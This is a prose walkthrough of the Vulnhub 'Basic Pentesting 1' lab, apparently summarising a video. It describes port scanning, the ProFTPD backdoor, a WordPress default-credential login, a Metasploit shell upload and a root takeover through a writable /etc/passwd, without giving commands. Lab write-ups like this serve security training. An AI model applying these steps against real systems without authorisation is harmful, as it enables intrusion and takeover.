We covered the solution walkthrough of Basic pentesting 1 Vulnhub by introducing the basic steps and methodology involved in a penetration test.
Getting a Lay of the Land
The process kicks off with some initial detective work. We use a common tool called nmap
to scan the target machine, which is like checking all the doors and windows on a building to see which ones are unlocked. This scan quickly reveals three open pathways: an FTP server for file transfers, an SSH port for secure logins, and a web server.
Initial Scanning and Enumeration
The first step is scanning the machine with Nmap to discover open ports and services. The scan reveals three open ports: FTP (21), SSH (22), and HTTP (80).We then update the host file to map the machine’s IP to vtac and uses Nikto to scan the web server for vulnerabilities.
Open Ports
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2
80/tcp open http Apache httpd 2.4.18 (Ubuntu)
We used searchsploit commond to search ProFTPD 1.3.3c on ExploitDB.
And for that, we discovered two exploits. There was a backdoor in ProFTPD 1.3.3c. A backdoor is a malicious code hidden in the source code. Furthermore, Metasploit-framework is capable of exploiting this Backdoor Command Execution vulnerability.
Discovering a WordPress Installation
Nikto reveals a WordPress installation in the /secret
directory. The tester uses WPScan to enumerate the WordPress site.WPScan identifies the WordPress username as admin, and we try the default credentials admin/admin, which successfully grants access to the WordPress dashboard.
Exploitation Using Metasploit
After logging into WordPress, the tester uses Metasploit to exploit the WordPress installation.The WP Admin Shell Upload exploit is used to upload a shell and gain a Meterpreter session on the target machine, providing shell access as the www-data
user.
Gaining Initial Access
Now with valid login credentials, it’s time to take control. We turn to the powerful Metasploit framework, a toolkit packed with pre-made exploits. They find a suitable exploit designed for WordPress, feed it the machine’s address and the “admin:admin” login details, and run it. The exploit works perfectly, uploading a small program that gives them a basic “shell,” which is essentially a command line on the target machine.
Privilege Escalation
To escalate privileges, the tester runs Unix Privilege Checker, which checks for privilege escalation vectors on the system.The tool identifies that the /etc/passwd file is writable, which allows the tester to modify the file and add a new root password.The tester generates an encrypted password using OpenSSL and replaces the root password in /etc/passwd
, allowing them to log in as root.
Becoming Root
Having a basic shell is good, but the ultimate goal is to have root access, which is the highest level of control. To find a way to elevate their privileges, the presenter runs a script that checks for common security misconfigurations.
The script hits the jackpot: it discovers that a critical system file, /etc/passwd
(which stores user account information), is writable. This is a major security flaw. We download this file, cleverly creates a new password for the “root” user, and replaces the old password hash in the file with the new one. They then upload the modified file back to the machine. With the new password in place, they simply switch to the root user, and just like that, they have complete control.
An Alternative Route: The Second Method
We also briefly explore another potential path to root access. The initial scan had shown a potentially vulnerable version of an FTP service running. We find an exploit for it in Metasploit but run into some technical trouble with the target machine becoming unresponsive. However, we explain that this alternative route could have also led to a shell, from which we could have worked to gain root access.
In essence, the video provides a clear and practical walkthrough of a penetration test, from the initial scan to a full system takeover, highlighting how a series of small vulnerabilities can be chained together to achieve a significant breach.